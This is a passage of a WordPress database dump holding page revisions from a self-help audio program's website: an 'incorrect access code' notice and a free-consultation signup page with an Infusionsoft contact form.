(1221, 4194, '2014-07-04 10:07:44', '2014-07-04 15:07:44', '<div id="init" style="<?php echo $style_init;?>">\r\n<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to re-set the access code.</h6>\r\n<h6 style="text-align: center;">If you have already purchased the Clear Your Beliefs Program and, after submitting the form, you are still experiencing difficulties gaining access, please contact <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a></h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;\r\n\r\n</div>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-04 10:07:44', '2014-07-04 15:07:44', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1222, 4194, '2014-07-04 10:09:08', '2014-07-04 15:09:08', '<div id="init" style="display:<?php echo $style_init;?>">\r\n<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to re-set the access code.</h6>\r\n<h6 style="text-align: center;">If you have already purchased the Clear Your Beliefs Program and, after submitting the form, you are still experiencing difficulties gaining access, please contact <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a></h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;\r\n\r\n</div>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-04 10:09:08', '2014-07-04 15:09:08', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1223, 4194, '2014-07-04 10:10:18', '2014-07-04 15:10:18', '<div id="init" style="display: &lt;?php echo $style_init;">\r\n<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to re-set the access code.</h6>\r\n<h6 style="text-align: center;">If you have already purchased the Clear Your Beliefs Program and, after submitting the form, you are still experiencing difficulties gaining access, please contact <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a></h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;\r\n\r\n</div>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-04 10:10:18', '2014-07-04 15:10:18', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1224, 4194, '2014-07-04 10:17:08', '2014-07-04 15:17:08', '<div id="init" style="display: <?php echo $style_init;?>">\r\n<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to re-set the access code.</h6>\r\n<h6 style="text-align: center;">If you have already purchased the Clear Your Beliefs Program and, after submitting the form, you are still experiencing difficulties gaining access, please contact <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a></h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;\r\n\r\n</div>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-04 10:17:08', '2014-07-04 15:17:08', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1229, 4194, '2014-07-04 15:44:50', '2014-07-04 20:44:50', '<h1 style="text-align: center;">Free 20-minute Consultation\r\nwith a Clear Your Beliefs Coach</h1>\r\nWould you like to find out whether Clear Your Beliefs is right for you?\r\n\r\nRegister for a free 20-minute consultation with a professional <em>Clear Your Beliefs Coach</em>.  He or she will answer your questions, and give you a taste of what''s possible with our program.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "Transform Your Beliefs," as a gift.  It''s a beautiful primer on beliefs and the Clear Your Beliefs program.\r\n\r\nFill out this form to schedule your 20-minute consultation.  A Clear Your Beliefs Coach will respond to you within 72 hours.\r\n\r\nMany people find this initial consultation so valuable that they want to go deeper immediately.  After 20-minutes, your Coach will offer you the option of extending your session to a full hour, at additional cost.\r\n\r\nWe''d love to get your feedback after you have your 20-minute consultation. Please write to us at support@clearyourbeliefs.com, and let us know about your experience.\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 100%; margin: 30px auto;">\r\n<div style="width:47%; float:left;">\r\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" method="POST"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /><input name="inf_form_name" type="hidden" value="CYB 20 min free consult w/ Ebook" /><input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City"> City</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_State"> State</label>\r\n\r\n<input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Country"> Country</label>\r\n\r\n<select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select>\r\n\r\n</div>\r\n</div>\r\n<div style="width:47%; float:left;">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_Timetocontact">Best time to reach me by phone.</label>\r\n\r\n<input id="inf_custom_Timetocontact" class="infusion-field-input-container" name="inf_custom_Timetocontact" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</div>\r\n</form></div></div>', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-07-04 15:44:50', '2014-07-04 20:44:50', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0),
(1230, 4194, '2014-07-04 15:47:49', '2014-07-04 20:47:49', '<h1 style="text-align: center;">Free 20-minute Consultation\r\nwith a Clear Your Beliefs Coach</h1>\r\nWould you like to find out whether Clear Your Beliefs is right for you?\r\n\r\nRegister for a free 20-minute consultation with a professional <em>Clear Your Beliefs Coach</em>.  He or she will answer your questions, and give you a taste of what''s possible with our program.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "Transform Your Beliefs," as a gift.  It''s a beautiful primer on beliefs and the Clear Your Beliefs program.\r\n\r\nFill out this form to schedule your 20-minute consultation.  A Clear Your Beliefs Coach will respond to you within 72 hours.\r\n\r\nMany people find this initial consultation so valuable that they want to go deeper immediately.  After 20-minutes, your Coach will offer you the option of extending your session to a full hour, at additional cost.\r\n\r\nWe''d love to get your feedback after you have your 20-minute consultation. Please write to us at support@clearyourbeliefs.com, and let us know about your experience.\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 100%; margin: 30px auto; min-height: 500px;">\r\n<div style="width:47%; float:left;">\r\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" method="POST"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /><input name="inf_form_name" type="hidden" value="CYB 20 min free consult w/ Ebook" /><input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City"> City</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_State"> State</label>\r\n\r\n<input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Country"> Country</label>\r\n\r\n<select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select>\r\n\r\n</div>\r\n</div>\r\n<div style="width:47%; float:left;">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_Timetocontact">Best time to reach me by phone.</label>\r\n\r\n<input id="inf_custom_Timetocontact" class="infusion-field-input-container" name="inf_custom_Timetocontact" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</div>\r\n</form></div></div>', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-07-04 15:47:49', '2014-07-04 20:47:49', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0),
